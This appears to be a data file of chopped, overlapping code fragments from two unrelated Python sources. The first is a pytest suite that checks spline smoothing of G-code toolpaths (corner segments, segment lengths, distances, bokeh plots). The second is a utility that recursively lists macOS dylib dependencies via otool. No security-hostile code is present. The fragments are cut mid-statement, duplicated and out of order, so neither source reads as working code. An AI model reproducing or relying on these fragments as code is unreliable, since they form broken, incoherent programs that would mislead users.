"+ np.linalg.norm([20, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(10 + np.linalg.norm([20, 0.1]), abs=0.1) check_distances(data)",
"np.linalg.norm([50, 50]) + np.linalg.norm([50, 50]) ) check_distances(data) plotter(data) def test_90_corner(plotter): data = generate_curves([",
"SegmentChecker.end_error_segment_middle self.check_distance(self.spline_end, 1.5) def check_continuity(self): msg = \"There's a discontinuity at the end",
"self.spline_mid, \\ \"The endpoint of the corner spline is before the line segment",
"generate_curves([ \"G1 X100 Y0\", \"G1 X100 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3",
"\"G1 X100 Y0\", \"G1 X200 Y1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data,",
"0], y0=data.start_xy[:, 1], y1=data.end_xy[:, 1], line_width=1, line_color=\"red\", line_dash=\"dotted\" ) ts = data.smoothed_toolpath.fixed_curvature_speeds(0, data.smoothed_toolpath.start_xy.shape[0],",
"point): return np.linalg.norm(linea - point) + np.linalg.norm(lineb - point)\\ - np.linalg.norm(linea - lineb)",
"of the corner spline is before the line segment end\" corner_error = \"The",
"start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 100 + np.linalg.norm([100, 1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\",
"== pytest.approx(0, abs=1e-12), msg self.check_distance(self.spline_mid, 0.5) def check_point_on_line(self): msg = \"The middle point",
"self.check_distance(self.spline_mid, 1.0) def check_corner_middle_short(self): assert np.linalg.norm(self.end_point - self.spline(self.spline_mid)) ==\\ pytest.approx(0.01, abs=1e-12), \\ SegmentChecker.corner_error",
"checker.check_end_point_on() elif end == \"middle\": checker.check_end_point_middle() else: assert False, \"Invalid end type\" checker.check_continuity()",
"import pytest from numpy.testing import * import numpy as np import scipy as",
"\\ pytest.approx(100 + np.linalg.norm([100, 100]), abs=0.1) check_distances(data) plotter(data) def test_very_obtuse_corner(plotter): data = generate_curves([",
"data = generate_curves([ \"G1 X10 Y0\", \"G1 X20 Y0.1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0]",
"point_on_line(linea, lineb, point): return np.linalg.norm(linea - point) + np.linalg.norm(lineb - point)\\ - np.linalg.norm(linea",
"pytest.approx(self.spline.distance(self.spline_start), abs=0.001), \\ \"The previous segment end distance and the current segment start",
"start=\"start\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) ==\\ pytest.approx(np.linalg.norm([100, 200])) check_distances(data) plotter(data) def test_two_straight_lines(plotter): data =",
"- 1: self.start_next_line_dist = self.start_line_dist + self.line_length self.next_line_length = xy_lengths[l+1] def check_distance(self, spline,",
"10 + np.linalg.norm([10, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(10 + np.linalg.norm([10, 0.1]), abs=0.1)",
"data = generate_curves([ \"G1 X100 Y0\", \"G1 X100 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0]",
"def test_three_long_lines_with_z_move(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X100 Y100\", \"G1 Z10\",",
"msg = \"There's a discontinuity at the end of the spline segment\" if",
"not end where the current one starts\" assert_array_almost_equal(self.spline(self.spline_start-1e-12), self.spline(self.spline_start), err_msg=msg) assert self.spline.distance(self.spline_start-1e-12) <=\\",
"previous segment does not end where the current one starts\" assert_array_almost_equal(self.spline(self.spline_start-1e-12), self.spline(self.spline_start), err_msg=msg)",
"np.linalg.norm(lineb - point)\\ - np.linalg.norm(linea - lineb) def point_on_middle_of_line(linea, lineb, point): mid =",
"], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 1 straight_segment(data, l=0, s=0, start=\"start\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths)",
"return plot def point_on_line(linea, lineb, point): return np.linalg.norm(linea - point) + np.linalg.norm(lineb -",
"start=\"start\", end=\"middle\") corner_segment(data, l=0, s=1, start=\"middle\", end=\"middle\") # Note that this line is",
"point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_start)) == pytest.approx(0, abs=1e-3), msg self.check_distance(self.spline_start, 0.5) def check_line_start_point_end(self): msg =",
"end, True) checker.check_corner_spline_order() if start == \"on\": checker.check_start_point_on() elif start == \"middle\": checker.check_line_start_point_middle()",
"on the line\" def check_end_point_on(self): assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_end)) == \\ pytest.approx(0, abs=1e-12),",
"l=0, s=1, start=\"on\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"end\") straight_segment(data, l=1, s=3, start=\"end\",",
"abs=0.1) check_distances(data) plotter(data) def test_obtuse_corner_with_shorter_and_longer_line(plotter): data = generate_curves([ \"G1 X10 Y0\", \"G1 X30",
"end == \"end\": checker.check_end_point_end() elif end == \"on\": checker.check_end_point_on() elif end == \"middle\":",
"end, False) if start == \"start\": checker.check_start_point_start() elif start == \"on\": checker.check_start_point_on() elif",
"= end self.start_point = data.start_xy[l] self.end_point = data.end_xy[l] if l != data.start_xy.shape[0] -",
"= xy_lengths[l] if l < data.start_xy.shape[0] - 1: self.start_next_line_dist = self.start_line_dist + self.line_length",
"straight_segment(data, l=1, s=2, start=\"middle\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 10 + np.linalg.norm([10, 0.1]) assert",
"type\" checker.check_continuity() def check_distances(data): t = data.smoothed_toolpath.fixed_distances(0, data.smoothed_toolpath.total_distance(), 10) assert_array_almost_equal(data.smoothed_toolpath.distance(t), np.linspace(0, data.smoothed_toolpath.total_distance(), 10))",
"prev_end == self.spline_start, \\ \"The previous segment does not end where the current",
"data @pytest.fixture(scope=\"function\") def plotter(figures, request): def plot(data: Data): p = plt.Figure( plot_width=1000, plot_height=1000,",
"figures(): path, filename = os.path.split(os.path.realpath(__file__)) path = os.path.join(path, \"output\") os.makedirs(path, exist_ok=True) plt.output_file(os.path.join(path, os.path.splitext(filename)[0]",
"data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"middle\") corner_segment(data, l=0, s=1, start=\"middle\", end=\"middle\")",
"np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(100 + np.linalg.norm([100, 100]), abs=0.1) check_distances(data) plotter(data) def test_very_acute_corner(plotter): data",
"X100 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\")",
"\\ pytest.approx(100 + np.linalg.norm([100, 1]), abs=0.1) check_distances(data) plotter(data) def test_obtuse_corner_with_short_lines(plotter): data = generate_curves([",
"if start == \"start\": checker.check_start_point_start() elif start == \"on\": checker.check_start_point_on() elif start ==",
"self.start_next_line_dist + self.next_line_length * (line-1.0) assert self.spline.distance(spline) <= line_dist and \\ self.spline.distance(spline) ==",
"\"The previous segment end distance and the current segment start do not match",
"end, corner): self.data = data self.s = s self.start = start self.end =",
"- data.start_xy, axis=1) self.start_line_dist = np.sum(xy_lengths[:l]) self.line_length = xy_lengths[l] if l < data.start_xy.shape[0]",
"np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(10 + np.linalg.norm([10, 0.1]) + np.linalg.norm([10, 0.2]), abs=0.1) check_distances(data) plotter(data)",
"np.linalg.norm([100, 100]), abs=0.1) check_distances(data) plotter(data) def test_very_obtuse_corner(plotter): data = generate_curves([ \"G1 X100 Y0\",",
"start=\"on\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 200.0 assert np.sum(data.smoothed_toolpath.segment_lengths)",
"enough\" def check_corner_middle_normal(self): assert np.linalg.norm(self.end_point - self.spline(self.spline_mid)) <= 0.01,\\ SegmentChecker.corner_error self.check_distance(self.spline_mid, 1.0) def",
"np.linalg.norm([10, 0.2]), abs=0.1) check_distances(data) plotter(data) def test_three_long_lines_with_z_move(plotter): data = generate_curves([ \"G1 X100 Y0\",",
"end=\"on\") straight_segment(data, l=2, s=4, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 300 assert np.sum(data.smoothed_toolpath.segment_lengths) ==",
"if line <= 1.0: line_dist = self.start_line_dist + self.line_length * line else: line_dist",
"0.1) points = data.smoothed_toolpath(ts) p.line( points[:,0], points[:,1], line_width=2, line_color=\"blue\", line_dash=\"solid\" ) p.circle( points[:,0],",
"line_color=\"blue\", line_dash=\"solid\" ) p.circle( points[:,0], points[:,1], size=4, fill_color=\"white\" ) figures.append(p) return plot def",
"* 0.5 + linea return np.linalg.norm(point - mid) class SegmentChecker(object): def __init__(self,data, l,",
"Y0.1\", \"G1 X30 Y0.3\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 5 straight_segment(data, l=0, s=0,",
"err_msg=msg) self.check_distance(self.spline_start, 0) def check_start_point_on(self): msg = \"The start point of the spline",
"start=\"middle\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 20 + np.linalg.norm([10, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\",
"l=2, s=4, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 300 assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(300,",
"x0=data.start_xy[:, 0], x1=data.end_xy[:, 0], y0=data.start_xy[:, 1], y1=data.end_xy[:, 1], line_width=1, line_color=\"red\", line_dash=\"dotted\" ) ts",
"p = plt.Figure( plot_width=1000, plot_height=1000, x_range=(-250, 250), y_range=(-250, 250), match_aspect=True, lod_threshold=None, title=request.node.name )",
"self.data = data self.s = s self.start = start self.end = end self.start_point",
"\\ pytest.approx(0, abs=1e-12), msg def check_line_start_point_middle(self): msg = \"The start point of the",
"= data.smoothed_toolpath.fixed_curvature_speeds(0, data.smoothed_toolpath.start_xy.shape[0], 0.1) points = data.smoothed_toolpath(ts) p.line( points[:,0], points[:,1], line_width=2, line_color=\"blue\", line_dash=\"solid\"",
"+ self.spline_end) / 2.0 xy_lengths = np.linalg.norm(data.end_xy - data.start_xy, axis=1) self.start_line_dist = np.sum(xy_lengths[:l])",
"= \"The end point of the spline segment is not on the line\"",
"\"The previous segment does not end where the current one starts\" assert_array_almost_equal(self.spline(self.spline_start-1e-12), self.spline(self.spline_start),"
] |
[
"bool): self.executor = executor self.libraries = defaultdict(set) self.scanned = set() self.scan_private = scan_private",
"rls = RecursiveLibraryScanner(executor, scan_private=scan_private) return rls.scan(initial_target) def scan_libraries(target): in_load_dylib = False libraries =",
"collections import defaultdict from concurrent.futures import Executor from concurrent.futures.thread import ThreadPoolExecutor class RecursiveLibraryScanner:",
"not smells_private(lib)} for (target, libraries) in scanned_libraries.items() if not smells_private(target) } return public_libraries",
"True if in_load_dylib and line.startswith(\"name \"): words = line.split() lib = words[1] libraries.add(lib)",
"scan_libraries_recursive(initial_target, scan_private=True): with ThreadPoolExecutor() as executor: rls = RecursiveLibraryScanner(executor, scan_private=scan_private) return rls.scan(initial_target) def",
"encoding=\"utf-8\" ).splitlines(): line = line.strip() if line == \"cmd LC_LOAD_DYLIB\": in_load_dylib = True",
"words[1] libraries.add(lib) in_load_dylib = False return libraries def smells_private(lib): if lib.startswith(\"/System/Library\"): return True",
"job = self.executor.submit(self._scan, target) job.add_done_callback(self._check) self.jobs.append(job) def _scan(self, target): # print(\"scanning\", target, file=sys.stderr)",
"j in self.jobs): self.all_done.set() def _enqueue(self, target): job = self.executor.submit(self._scan, target) job.add_done_callback(self._check) self.jobs.append(job)",
"line = line.strip() if line == \"cmd LC_LOAD_DYLIB\": in_load_dylib = True if in_load_dylib",
"import threading from collections import defaultdict from concurrent.futures import Executor from concurrent.futures.thread import",
"in subprocess.check_output( [\"otool\", \"-l\", target], encoding=\"utf-8\" ).splitlines(): line = line.strip() if line ==",
"line == \"cmd LC_LOAD_DYLIB\": in_load_dylib = True if in_load_dylib and line.startswith(\"name \"): words",
"or not is_private: self._enqueue(lib) def scan(self, target): self._enqueue(target) self.all_done.wait() return self.libraries def scan_libraries_recursive(initial_target,",
"self.jobs = [] self.all_done = threading.Event() def _check(self, job): if all(j.done() for j",
"RecursiveLibraryScanner(executor, scan_private=scan_private) return rls.scan(initial_target) def scan_libraries(target): in_load_dylib = False libraries = set() for",
"True if lib.startswith(\"/usr/lib/\"): return True if lib.startswith(\"/usr/local/lib/\"): return True return False def filter_private(scanned_libraries):",
"scan_private self.jobs = [] self.all_done = threading.Event() def _check(self, job): if all(j.done() for",
").splitlines(): line = line.strip() if line == \"cmd LC_LOAD_DYLIB\": in_load_dylib = True if",
"= executor self.libraries = defaultdict(set) self.scanned = set() self.scan_private = scan_private self.jobs =",
"executor self.libraries = defaultdict(set) self.scanned = set() self.scan_private = scan_private self.jobs = []",
"False libraries = set() for line in subprocess.check_output( [\"otool\", \"-l\", target], encoding=\"utf-8\" ).splitlines():",
"for line in subprocess.check_output( [\"otool\", \"-l\", target], encoding=\"utf-8\" ).splitlines(): line = line.strip() if",
"= self.executor.submit(self._scan, target) job.add_done_callback(self._check) self.jobs.append(job) def _scan(self, target): # print(\"scanning\", target, file=sys.stderr) self.scanned.add(target)",
"threading from collections import defaultdict from concurrent.futures import Executor from concurrent.futures.thread import ThreadPoolExecutor",
"[] self.all_done = threading.Event() def _check(self, job): if all(j.done() for j in self.jobs):",
"self._enqueue(lib) def scan(self, target): self._enqueue(target) self.all_done.wait() return self.libraries def scan_libraries_recursive(initial_target, scan_private=True): with ThreadPoolExecutor()",
"LC_LOAD_DYLIB\": in_load_dylib = True if in_load_dylib and line.startswith(\"name \"): words = line.split() lib",
"\"-l\", target], encoding=\"utf-8\" ).splitlines(): line = line.strip() if line == \"cmd LC_LOAD_DYLIB\": in_load_dylib",
"== \"cmd LC_LOAD_DYLIB\": in_load_dylib = True if in_load_dylib and line.startswith(\"name \"): words =",
"scan_private: bool): self.executor = executor self.libraries = defaultdict(set) self.scanned = set() self.scan_private =",
"self.all_done.set() def _enqueue(self, target): job = self.executor.submit(self._scan, target) job.add_done_callback(self._check) self.jobs.append(job) def _scan(self, target):",
"ThreadPoolExecutor() as executor: rls = RecursiveLibraryScanner(executor, scan_private=scan_private) return rls.scan(initial_target) def scan_libraries(target): in_load_dylib =",
"lib.startswith(\"/System/Library\"): return True if lib.startswith(\"/usr/lib/\"): return True if lib.startswith(\"/usr/local/lib/\"): return True return False",
"libraries if not smells_private(lib)} for (target, libraries) in scanned_libraries.items() if not smells_private(target) }",
"words = line.split() lib = words[1] libraries.add(lib) in_load_dylib = False return libraries def",
"target): # print(\"scanning\", target, file=sys.stderr) self.scanned.add(target) for lib in scan_libraries(target): self.libraries[target].add(lib) if lib",
"libraries def smells_private(lib): if lib.startswith(\"/System/Library\"): return True if lib.startswith(\"/usr/lib/\"): return True if lib.startswith(\"/usr/local/lib/\"):",
"is_private = smells_private(lib) if (is_private and self.scan_private) or not is_private: self._enqueue(lib) def scan(self,",
"= [] self.all_done = threading.Event() def _check(self, job): if all(j.done() for j in",
"self.libraries = defaultdict(set) self.scanned = set() self.scan_private = scan_private self.jobs = [] self.all_done",
"= line.strip() if line == \"cmd LC_LOAD_DYLIB\": in_load_dylib = True if in_load_dylib and",
"lib.startswith(\"/usr/lib/\"): return True if lib.startswith(\"/usr/local/lib/\"): return True return False def filter_private(scanned_libraries): public_libraries =",
"RecursiveLibraryScanner: def __init__(self, executor: Executor, scan_private: bool): self.executor = executor self.libraries = defaultdict(set)",
"self.executor = executor self.libraries = defaultdict(set) self.scanned = set() self.scan_private = scan_private self.jobs",
"if lib.startswith(\"/usr/lib/\"): return True if lib.startswith(\"/usr/local/lib/\"): return True return False def filter_private(scanned_libraries): public_libraries",
"target): self._enqueue(target) self.all_done.wait() return self.libraries def scan_libraries_recursive(initial_target, scan_private=True): with ThreadPoolExecutor() as executor: rls",
"target) job.add_done_callback(self._check) self.jobs.append(job) def _scan(self, target): # print(\"scanning\", target, file=sys.stderr) self.scanned.add(target) for lib",
"# print(\"scanning\", target, file=sys.stderr) self.scanned.add(target) for lib in scan_libraries(target): self.libraries[target].add(lib) if lib not",
"for j in self.jobs): self.all_done.set() def _enqueue(self, target): job = self.executor.submit(self._scan, target) job.add_done_callback(self._check)",
"\"): words = line.split() lib = words[1] libraries.add(lib) in_load_dylib = False return libraries",
"if in_load_dylib and line.startswith(\"name \"): words = line.split() lib = words[1] libraries.add(lib) in_load_dylib",
"def smells_private(lib): if lib.startswith(\"/System/Library\"): return True if lib.startswith(\"/usr/lib/\"): return True if lib.startswith(\"/usr/local/lib/\"): return",
"def __init__(self, executor: Executor, scan_private: bool): self.executor = executor self.libraries = defaultdict(set) self.scanned",
"set() for line in subprocess.check_output( [\"otool\", \"-l\", target], encoding=\"utf-8\" ).splitlines(): line = line.strip()",
"from concurrent.futures import Executor from concurrent.futures.thread import ThreadPoolExecutor class RecursiveLibraryScanner: def __init__(self, executor:",
"__init__(self, executor: Executor, scan_private: bool): self.executor = executor self.libraries = defaultdict(set) self.scanned =",
"False return libraries def smells_private(lib): if lib.startswith(\"/System/Library\"): return True if lib.startswith(\"/usr/lib/\"): return True",
"self.scanned = set() self.scan_private = scan_private self.jobs = [] self.all_done = threading.Event() def",
"return rls.scan(initial_target) def scan_libraries(target): in_load_dylib = False libraries = set() for line in",
"def _enqueue(self, target): job = self.executor.submit(self._scan, target) job.add_done_callback(self._check) self.jobs.append(job) def _scan(self, target): #",
"def scan_libraries_recursive(initial_target, scan_private=True): with ThreadPoolExecutor() as executor: rls = RecursiveLibraryScanner(executor, scan_private=scan_private) return rls.scan(initial_target)",
"def scan_libraries(target): in_load_dylib = False libraries = set() for line in subprocess.check_output( [\"otool\",",
"self.all_done.wait() return self.libraries def scan_libraries_recursive(initial_target, scan_private=True): with ThreadPoolExecutor() as executor: rls = RecursiveLibraryScanner(executor,",
"True if lib.startswith(\"/usr/local/lib/\"): return True return False def filter_private(scanned_libraries): public_libraries = { target:",
"def scan(self, target): self._enqueue(target) self.all_done.wait() return self.libraries def scan_libraries_recursive(initial_target, scan_private=True): with ThreadPoolExecutor() as",
"job): if all(j.done() for j in self.jobs): self.all_done.set() def _enqueue(self, target): job =",
"scan_libraries(target): in_load_dylib = False libraries = set() for line in subprocess.check_output( [\"otool\", \"-l\",",
"return libraries def smells_private(lib): if lib.startswith(\"/System/Library\"): return True if lib.startswith(\"/usr/lib/\"): return True if",
"all(j.done() for j in self.jobs): self.all_done.set() def _enqueue(self, target): job = self.executor.submit(self._scan, target)",
"= { target: {lib for lib in libraries if not smells_private(lib)} for (target,",
"self.libraries def scan_libraries_recursive(initial_target, scan_private=True): with ThreadPoolExecutor() as executor: rls = RecursiveLibraryScanner(executor, scan_private=scan_private) return",
"not in self.scanned: is_private = smells_private(lib) if (is_private and self.scan_private) or not is_private:",
"_check(self, job): if all(j.done() for j in self.jobs): self.all_done.set() def _enqueue(self, target): job",
"concurrent.futures import Executor from concurrent.futures.thread import ThreadPoolExecutor class RecursiveLibraryScanner: def __init__(self, executor: Executor,",
"return False def filter_private(scanned_libraries): public_libraries = { target: {lib for lib in libraries",
"in libraries if not smells_private(lib)} for (target, libraries) in scanned_libraries.items() if not smells_private(target)",
"and line.startswith(\"name \"): words = line.split() lib = words[1] libraries.add(lib) in_load_dylib = False",
"scan_private=True): with ThreadPoolExecutor() as executor: rls = RecursiveLibraryScanner(executor, scan_private=scan_private) return rls.scan(initial_target) def scan_libraries(target):",
"\"cmd LC_LOAD_DYLIB\": in_load_dylib = True if in_load_dylib and line.startswith(\"name \"): words = line.split()",
"= line.split() lib = words[1] libraries.add(lib) in_load_dylib = False return libraries def smells_private(lib):",
"Executor, scan_private: bool): self.executor = executor self.libraries = defaultdict(set) self.scanned = set() self.scan_private",
"if (is_private and self.scan_private) or not is_private: self._enqueue(lib) def scan(self, target): self._enqueue(target) self.all_done.wait()",
"(is_private and self.scan_private) or not is_private: self._enqueue(lib) def scan(self, target): self._enqueue(target) self.all_done.wait() return",
"public_libraries = { target: {lib for lib in libraries if not smells_private(lib)} for",
"filter_private(scanned_libraries): public_libraries = { target: {lib for lib in libraries if not smells_private(lib)}",
"lib in scan_libraries(target): self.libraries[target].add(lib) if lib not in self.scanned: is_private = smells_private(lib) if",
"in_load_dylib = True if in_load_dylib and line.startswith(\"name \"): words = line.split() lib =",
"return True if lib.startswith(\"/usr/local/lib/\"): return True return False def filter_private(scanned_libraries): public_libraries = {",
"libraries.add(lib) in_load_dylib = False return libraries def smells_private(lib): if lib.startswith(\"/System/Library\"): return True if",
"self.libraries[target].add(lib) if lib not in self.scanned: is_private = smells_private(lib) if (is_private and self.scan_private)",
"= set() for line in subprocess.check_output( [\"otool\", \"-l\", target], encoding=\"utf-8\" ).splitlines(): line =",
"as executor: rls = RecursiveLibraryScanner(executor, scan_private=scan_private) return rls.scan(initial_target) def scan_libraries(target): in_load_dylib = False",
"self.executor.submit(self._scan, target) job.add_done_callback(self._check) self.jobs.append(job) def _scan(self, target): # print(\"scanning\", target, file=sys.stderr) self.scanned.add(target) for",
"job.add_done_callback(self._check) self.jobs.append(job) def _scan(self, target): # print(\"scanning\", target, file=sys.stderr) self.scanned.add(target) for lib in",
"defaultdict from concurrent.futures import Executor from concurrent.futures.thread import ThreadPoolExecutor class RecursiveLibraryScanner: def __init__(self,",
"rls.scan(initial_target) def scan_libraries(target): in_load_dylib = False libraries = set() for line in subprocess.check_output(",
"line.split() lib = words[1] libraries.add(lib) in_load_dylib = False return libraries def smells_private(lib): if",
"_scan(self, target): # print(\"scanning\", target, file=sys.stderr) self.scanned.add(target) for lib in scan_libraries(target): self.libraries[target].add(lib) if",
"self.scanned: is_private = smells_private(lib) if (is_private and self.scan_private) or not is_private: self._enqueue(lib) def",
"False def filter_private(scanned_libraries): public_libraries = { target: {lib for lib in libraries if",
"libraries = set() for line in subprocess.check_output( [\"otool\", \"-l\", target], encoding=\"utf-8\" ).splitlines(): line",
"def filter_private(scanned_libraries): public_libraries = { target: {lib for lib in libraries if not",
"self.all_done = threading.Event() def _check(self, job): if all(j.done() for j in self.jobs): self.all_done.set()",
"if lib not in self.scanned: is_private = smells_private(lib) if (is_private and self.scan_private) or",
"in_load_dylib and line.startswith(\"name \"): words = line.split() lib = words[1] libraries.add(lib) in_load_dylib =",
"= RecursiveLibraryScanner(executor, scan_private=scan_private) return rls.scan(initial_target) def scan_libraries(target): in_load_dylib = False libraries = set()",
"if lib.startswith(\"/usr/local/lib/\"): return True return False def filter_private(scanned_libraries): public_libraries = { target: {lib",
"True return False def filter_private(scanned_libraries): public_libraries = { target: {lib for lib in",
"subprocess.check_output( [\"otool\", \"-l\", target], encoding=\"utf-8\" ).splitlines(): line = line.strip() if line == \"cmd",
"self.scanned.add(target) for lib in scan_libraries(target): self.libraries[target].add(lib) if lib not in self.scanned: is_private =",
"self.jobs): self.all_done.set() def _enqueue(self, target): job = self.executor.submit(self._scan, target) job.add_done_callback(self._check) self.jobs.append(job) def _scan(self,",
"= False return libraries def smells_private(lib): if lib.startswith(\"/System/Library\"): return True if lib.startswith(\"/usr/lib/\"): return",
"smells_private(lib): if lib.startswith(\"/System/Library\"): return True if lib.startswith(\"/usr/lib/\"): return True if lib.startswith(\"/usr/local/lib/\"): return True",
"import subprocess import threading from collections import defaultdict from concurrent.futures import Executor from",
"self.scan_private) or not is_private: self._enqueue(lib) def scan(self, target): self._enqueue(target) self.all_done.wait() return self.libraries def",
"scan_libraries(target): self.libraries[target].add(lib) if lib not in self.scanned: is_private = smells_private(lib) if (is_private and",
"if not smells_private(lib)} for (target, libraries) in scanned_libraries.items() if not smells_private(target) } return",
"= set() self.scan_private = scan_private self.jobs = [] self.all_done = threading.Event() def _check(self,",
"lib not in self.scanned: is_private = smells_private(lib) if (is_private and self.scan_private) or not",
"scan(self, target): self._enqueue(target) self.all_done.wait() return self.libraries def scan_libraries_recursive(initial_target, scan_private=True): with ThreadPoolExecutor() as executor:",
"in_load_dylib = False libraries = set() for line in subprocess.check_output( [\"otool\", \"-l\", target],",
"= True if in_load_dylib and line.startswith(\"name \"): words = line.split() lib = words[1]",
"_enqueue(self, target): job = self.executor.submit(self._scan, target) job.add_done_callback(self._check) self.jobs.append(job) def _scan(self, target): # print(\"scanning\",",
"for lib in scan_libraries(target): self.libraries[target].add(lib) if lib not in self.scanned: is_private = smells_private(lib)",
"in self.jobs): self.all_done.set() def _enqueue(self, target): job = self.executor.submit(self._scan, target) job.add_done_callback(self._check) self.jobs.append(job) def",
"print(\"scanning\", target, file=sys.stderr) self.scanned.add(target) for lib in scan_libraries(target): self.libraries[target].add(lib) if lib not in",
"executor: Executor, scan_private: bool): self.executor = executor self.libraries = defaultdict(set) self.scanned = set()",
"target: {lib for lib in libraries if not smells_private(lib)} for (target, libraries) in",
"if lib.startswith(\"/System/Library\"): return True if lib.startswith(\"/usr/lib/\"): return True if lib.startswith(\"/usr/local/lib/\"): return True return",
"smells_private(lib) if (is_private and self.scan_private) or not is_private: self._enqueue(lib) def scan(self, target): self._enqueue(target)",
"self._enqueue(target) self.all_done.wait() return self.libraries def scan_libraries_recursive(initial_target, scan_private=True): with ThreadPoolExecutor() as executor: rls =",
"set() self.scan_private = scan_private self.jobs = [] self.all_done = threading.Event() def _check(self, job):",
"if line == \"cmd LC_LOAD_DYLIB\": in_load_dylib = True if in_load_dylib and line.startswith(\"name \"):",
"target, file=sys.stderr) self.scanned.add(target) for lib in scan_libraries(target): self.libraries[target].add(lib) if lib not in self.scanned:",
"in scan_libraries(target): self.libraries[target].add(lib) if lib not in self.scanned: is_private = smells_private(lib) if (is_private",
"return True if lib.startswith(\"/usr/lib/\"): return True if lib.startswith(\"/usr/local/lib/\"): return True return False def",
"= scan_private self.jobs = [] self.all_done = threading.Event() def _check(self, job): if all(j.done()",
"scan_private=scan_private) return rls.scan(initial_target) def scan_libraries(target): in_load_dylib = False libraries = set() for line",
"def _scan(self, target): # print(\"scanning\", target, file=sys.stderr) self.scanned.add(target) for lib in scan_libraries(target): self.libraries[target].add(lib)",
"target): job = self.executor.submit(self._scan, target) job.add_done_callback(self._check) self.jobs.append(job) def _scan(self, target): # print(\"scanning\", target,",
"= defaultdict(set) self.scanned = set() self.scan_private = scan_private self.jobs = [] self.all_done =",
"def _check(self, job): if all(j.done() for j in self.jobs): self.all_done.set() def _enqueue(self, target):",
"lib in libraries if not smells_private(lib)} for (target, libraries) in scanned_libraries.items() if not",
"line.strip() if line == \"cmd LC_LOAD_DYLIB\": in_load_dylib = True if in_load_dylib and line.startswith(\"name",
"line.startswith(\"name \"): words = line.split() lib = words[1] libraries.add(lib) in_load_dylib = False return",
"lib.startswith(\"/usr/local/lib/\"): return True return False def filter_private(scanned_libraries): public_libraries = { target: {lib for",
"class RecursiveLibraryScanner: def __init__(self, executor: Executor, scan_private: bool): self.executor = executor self.libraries =",
"lib = words[1] libraries.add(lib) in_load_dylib = False return libraries def smells_private(lib): if lib.startswith(\"/System/Library\"):",
"{ target: {lib for lib in libraries if not smells_private(lib)} for (target, libraries)",
"file=sys.stderr) self.scanned.add(target) for lib in scan_libraries(target): self.libraries[target].add(lib) if lib not in self.scanned: is_private",
"= threading.Event() def _check(self, job): if all(j.done() for j in self.jobs): self.all_done.set() def",
"in_load_dylib = False return libraries def smells_private(lib): if lib.startswith(\"/System/Library\"): return True if lib.startswith(\"/usr/lib/\"):",
"from concurrent.futures.thread import ThreadPoolExecutor class RecursiveLibraryScanner: def __init__(self, executor: Executor, scan_private: bool): self.executor",
"self.scan_private = scan_private self.jobs = [] self.all_done = threading.Event() def _check(self, job): if",
"= smells_private(lib) if (is_private and self.scan_private) or not is_private: self._enqueue(lib) def scan(self, target):",
"{lib for lib in libraries if not smells_private(lib)} for (target, libraries) in scanned_libraries.items()",
"not is_private: self._enqueue(lib) def scan(self, target): self._enqueue(target) self.all_done.wait() return self.libraries def scan_libraries_recursive(initial_target, scan_private=True):",
"import defaultdict from concurrent.futures import Executor from concurrent.futures.thread import ThreadPoolExecutor class RecursiveLibraryScanner: def",
"subprocess import threading from collections import defaultdict from concurrent.futures import Executor from concurrent.futures.thread",
"executor: rls = RecursiveLibraryScanner(executor, scan_private=scan_private) return rls.scan(initial_target) def scan_libraries(target): in_load_dylib = False libraries",
"if all(j.done() for j in self.jobs): self.all_done.set() def _enqueue(self, target): job = self.executor.submit(self._scan,",
"self.jobs.append(job) def _scan(self, target): # print(\"scanning\", target, file=sys.stderr) self.scanned.add(target) for lib in scan_libraries(target):",
"is_private: self._enqueue(lib) def scan(self, target): self._enqueue(target) self.all_done.wait() return self.libraries def scan_libraries_recursive(initial_target, scan_private=True): with",
"defaultdict(set) self.scanned = set() self.scan_private = scan_private self.jobs = [] self.all_done = threading.Event()",
"from collections import defaultdict from concurrent.futures import Executor from concurrent.futures.thread import ThreadPoolExecutor class",
"Executor from concurrent.futures.thread import ThreadPoolExecutor class RecursiveLibraryScanner: def __init__(self, executor: Executor, scan_private: bool):",
"and self.scan_private) or not is_private: self._enqueue(lib) def scan(self, target): self._enqueue(target) self.all_done.wait() return self.libraries",
"with ThreadPoolExecutor() as executor: rls = RecursiveLibraryScanner(executor, scan_private=scan_private) return rls.scan(initial_target) def scan_libraries(target): in_load_dylib",
"import Executor from concurrent.futures.thread import ThreadPoolExecutor class RecursiveLibraryScanner: def __init__(self, executor: Executor, scan_private:",
"concurrent.futures.thread import ThreadPoolExecutor class RecursiveLibraryScanner: def __init__(self, executor: Executor, scan_private: bool): self.executor =",
"return True return False def filter_private(scanned_libraries): public_libraries = { target: {lib for lib",
